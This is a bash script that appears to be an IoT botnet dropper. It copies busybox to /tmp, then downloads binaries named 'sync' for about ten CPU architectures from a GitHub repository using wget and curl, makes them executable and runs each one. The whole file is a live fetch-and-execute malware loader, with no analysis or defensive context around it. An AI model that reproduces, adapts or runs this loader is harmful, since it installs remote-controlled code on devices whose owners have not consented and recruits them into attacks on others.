#!/bin/bash
ulimit -n 1024
cp /bin/busybox /tmp/
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.x86; curl -O https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.x86;cat sync.x86 >sync;chmod +x *;./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.mips; curl -O https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.mips;cat sync.mips >sync;chmod +x *;./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.mipsel; curl -O https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.mipsel;cat sync.mipsel >sync;chmod +x *;./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm4; curl -O https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm4;cat sync.arm4 >sync;chmod +x *;./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm5; curl -O https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm5;cat sync.arm5 >sync;chmod +x *;./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm6; curl -O https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm6;cat sync.arm6 >sync;chmod +x *;./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm7; curl -O https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.arm7;cat sync.arm7 >sync;chmod +x *;./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.powerpc; curl -O https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.powerpc;cat sync.powerpc >sync;chmod +x *;./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.m68k; curl -O https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.m68k;cat sync.m68k >sync;chmod +x *;./sync
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.sh4; curl -O https://github.com/joaophillipdev/1isb82ufkoy28utga0h/raw/refs/heads/main/sync.sh4;cat sync.sh4 >sync;chmod +x *;./sync
